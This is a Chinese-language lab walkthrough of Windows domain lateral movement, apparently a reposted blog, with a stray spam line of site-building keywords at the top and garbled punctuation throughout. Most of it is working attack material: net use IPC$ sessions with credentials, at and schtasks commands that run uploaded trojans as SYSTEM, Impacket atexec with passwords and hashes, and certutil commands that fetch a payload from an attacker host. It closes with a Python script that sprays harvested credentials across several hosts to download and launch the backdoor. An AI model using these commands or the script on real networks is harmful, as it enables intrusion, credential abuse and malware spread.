joomla网站建设,金蝶二次开发,网站后台服务,网站设计联系环境部署 案例一#xff1a; 域横向移动-IPC-命令版-atschtasks
首先是通过外网web访问到win2008#xff0c;获得了win2008的权限#xff0c;这一步不做演示 因为里面的主机都不出网#xff0c;所以只能利用win2008进行正向或者反向连接
信息收集
域内用户信息 域横向移动-IPC-命令版-atschtasks
首先是通过外网web访问到win2008获得了win2008的权限这一步不做演示 因为里面的主机都不出网所以只能利用win2008进行正向或者反向连接
信息收集
域内用户信息以及域控名 收集域控ip 现在知道了域内的网段探测存活主机一般主机都会默认开启IPC$ipc的端口是135这里利用
ipc建立隧道进行文件上传 目标列表可以查看存活主机 这里抓取hash以及明文密码需要提权到system
提权有很多种方法可以看这篇文章
第98天权限提升-WIN 全平台MSF 自动化CS 插件化EXP 筛选溢出漏洞_cs 利用插件提权的方法-CSDN博客第98天权限提升-WIN 全平台MSF 自动化CS 插件化EXP 筛选溢出漏洞_cs 利用插件提权的方法-CSDN博客获得了system权限利用system权限去抓取hash 这里其实直接有了域控的账号密码是因为我用管理员身份执行了一些操作
win7上线
这里不知道30的是win7还是别的主机
首先ipc建立隧道这里的思路就是利用刚才抓取的账号密码一个一个试可能别人用他的账号登录过这台主机那么他的账号密码就会记录下来这里我刚搭建的环境没登陆过假设账号密码已知^_^,或者你要是知道了域控管理员的账号直接利用管理员账号登录
shell net use \\目标ip\ipc$ 域控密码或者主机密码 /user:域控账号或者主机账号
shell net use \\192.168.3.30\ipc$ 123.com /user:qq.com\na
实验过程中发现该隧道如果windows防火墙打开的话无法建立连接 隧道建立完成后需要上传木马文件先尝试正向连接 生成后门 先把生成的木马上传到win2008 注意上传文件的时候至少需要用到管理员权限admin或system 添加计时任务win2012之前的主机用at命令就可以之后的主机用schetasks
shell at \\主机ip 时间 命令
shell at \\192.168.3.30 10.40 c:\2.exe
但是win7这里经过实验发现还是使用schetasksat命令更加简单一句话就可以这里就不复现了
#创建任务beacon
schtasks /create /s 192.168.3.30 /ru SYSTEM /tn beacon /sc DAILY /tr c:\2.exe /F#运行beacon
schtasks /U administrator /P 123.com /run /s 192.168.3.30 /tn beacon /i
命令参数
1.schtasks /change #更改任务的以下一个或多个属性任务运行的程序 (/tr)运行任务的用户帐户 (/ru)用户帐户的密码 (/rp)将仅交互式属性添加到任务 (/it)2.schtasks /create #计划新任务3.schtasks /delete #删除计划任务4.schtasks /end #停止任务启动的程序5.schtasks /query #显示计划在计算机上运行的任务6.schtasks /run #立即启动计划任务。 运行操作会忽略计划但使用任务中保存的程序文件位置、用户帐户和密码立即运行任务#/sc 启动时间参数为MINUTE、HOURLY、DAILY、WEEKLY等时需要指定/mo运行的间隔时间
/sc onlogon 用户登录时启动
/sc onstart 系统启动时启动
/sc onidle 系统空闲时启动
/sc MINUTE、 HOURLY、DAILY、WEEKLY、 MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT。
/sc 分钟、小时、每天、每周、每月、一次、开始、登录、空闲、事件。
参数
/sc 计划任务类型可选值为MINUTE、HOURLY、DAILY、WEEKLY、ONCE、ONSTART、ONLOGON、ONIDLE、MONTHLY、ONEVENT
/tn 计划任务名称后续查询、修改、删除、执行时使用
/tr 需要运行的程序或命令传入的命令中间如果有空格会被截断为程序和参数因此需要将双引号转义并传入。
/ru 运行任务的用户账户名不使用此参数的话使用执行schtasks命令的账户运行计划任务
/rp 运行任务的用户账户密码
/mo 指定任务在计划类型中的运行间隔
/d 指定任务在一个月或者星期的某一天运行只适用于MONTHLY和WEEKLY类型。
/m 指定任务在某个月运行只适用于MONTHLY类型。
/i 当计划任务类型为ONIDLE时运行任务前计算机处于空闲状态的分钟数。
/st 当计划任务类型为MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY时使用指定任务的开始时间默认为本地计算机的当前时间。
/ri 指定计划任务的重复间隔以分钟为单位。不适合计划类型MINUTE、HOURLY、ONSTART、ONLOGON、ONIDLE
/et 指定计划任务的结束时间适用于计划类型MINUTE、HOURLY 在指定的结束时间之后schtasks 不会再次启动任务除非当前系统时间调回开始时间。默认情况下没有结束时间。
/du 指定任务计划的持续时间与/et类似默认情况下没有持续时间。
/k 在指定计划任务的结束时间或持续时间后停止任务如果不加此参数则在时间到了会继续运行或者重启该任务。
/it 只在用户登录时运行
/z 在任务计划完成后删除任务计划
/f 在创建任务时如果任务已存在不显示警告
/RL 为作业设置运行级别。有效值为LIMITED 和 HIGHEST。默认值为 LIMITED。
/F 如果指定的任务已经存在则强制创建任务并抑制警告。创建并且运行 然后主动进行连接 因为我运行的账号密码是系统的账号密码所以获得的是system权限 如果不知道系统账户的用户名密码 所以还需要得知道主机的账号密码。感觉真实环境肯定更难一点……
win7上线后可以进一步抓取明文密码和hash进一步信息收集 正向上线完尝试反向上线 生成木马上传 创建计划任务并且运行 上线从这幅图里面可以看出来win7有一台是正向有一台是反向 win2019上线
这里win2019已经改为192.168.3.50win2019因为系统问题所以很多得需要更高的权限去执行
win2019采用反向上线 生成监听器 生成木马上传到win7
上传前看一下当前路径在哪里 创建ipc隧道这里上传的时候发现这里创建隧道已经不能再用域用户了要么使用这台主机的管理员用户要么使用域的管理员用户可能是系统的安全策略做了提升
shell net use \\192.168.3.50\ipc$ 123.com /user:qq.com\administrator 然后创建计时任务因为系统安全性的提高需要带上账号密码去创建计时任务
shell schtasks /create /s 192.168.3.50 /U administrator /P 123.com /ru SYSTEM /tn beacon /sc DAILY /tr c:\4.exe /F 然后运行 成功上线 案例二域横向移动-IPC-插件版-CSLSTARS 案例三 域横向移动-IPC-套件版-Impacket-atexec 1、Py版https://github.com/SecureAuthCorp/impacket python atexec.py god/administrator:Admin12345192.168.3.21 “ver” python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator192.168.3.21 “whoami” 2、Exe版https://gitee.com/RichChigga/impacket-examples-windows exe版本上传到win2019(50)去探测win2012(40)
atexec.exe 域名/账号:密码ip 命令
atexec.exe ./本地账号:密码ip 命令
atexec.exe qq.com/administrator:123.com192.168.3.40 whoami域用户 本地用户 它可以执行命令那么可以尝试用它进行上线首先思路是已经拿到了webserver然后上传木马文件到了webserver 让主机反向连接webserver 利用这条命令远程下载让win2012进行上线注意这里的ip是win2012的ip需要下载到自己的主机通过win2008让win2012执行命令然后下载
atexec.exe ./administrator:123.com192.168.3.40 certutil.exe -urlcache -split -f http://192.168.3.20:80/3.exe zx.exe 默认会下载到c:/windows/system32/下 执行成功上线 案例四: 域横向移动-IPC-代理版-SocksPyatexec
exe有个问题就是文件太大了上传py文件会好一点但是python文件目标主机也不一定有python环境最好的方式是建立节点在自己主机上运行。 代理转发 设置代理节点 直接在kali上运行通过kali连接win2008给自己的节点去连接win2012 在kali本地利用python文件远程下载木马 记得开启win2008的监听 kali本地执行木马 成功上线
然后可以写python文件批量进行连接思路就是把收集到的账号密码以及ip全部写成字典然后批量用atexec.py上传木马然后运行
win2008只获得了这几个密码 前面通过端口扫描获得的ip
import os
# 使用列表来存储密码确保每个密码都是独立的元素
passwords [ 123.com,
]
# IP 地址集合
ips { 192.168.3.20, 192.168.3.30, 192.168.3.40, 192.168.3.50
}
# 用户名集合
users { Administrator, jie
}
def xz(): # 下载后门 for ip in ips: for user in users: for password in passwords: # 注意修正了路径和用户名的问题 exec1 fpython atexec.py ./administrator:{password}{ip} certutil -urlcache -split -f http://192.168.3.10/3.exe zx.exe exec2 fpython atexec.py qq.com/{user}:{password}{ip} certutil -urlcache -split -f http://192.168.3.10/3.exe zx.exe print(--- exec1 ---) print(--- exec2 ---) os.system(exec1) os.system(exec2)
def zx(): # 执行后门 for ip in ips: for user in users: for password in passwords: # 注意修正了路径和用户名的问题 exec1 fpython atexec.py ./administrator:{password}{ip} zx.exe exec2 fpython atexec.py qq.com/{user}:{password}{ip} zx.exe print(--- exec1 ---) print(--- exec2 ---) os.system(exec1) os.system(exec2) if __name__ __main__: xz() zx()
通过代理执行这个文件
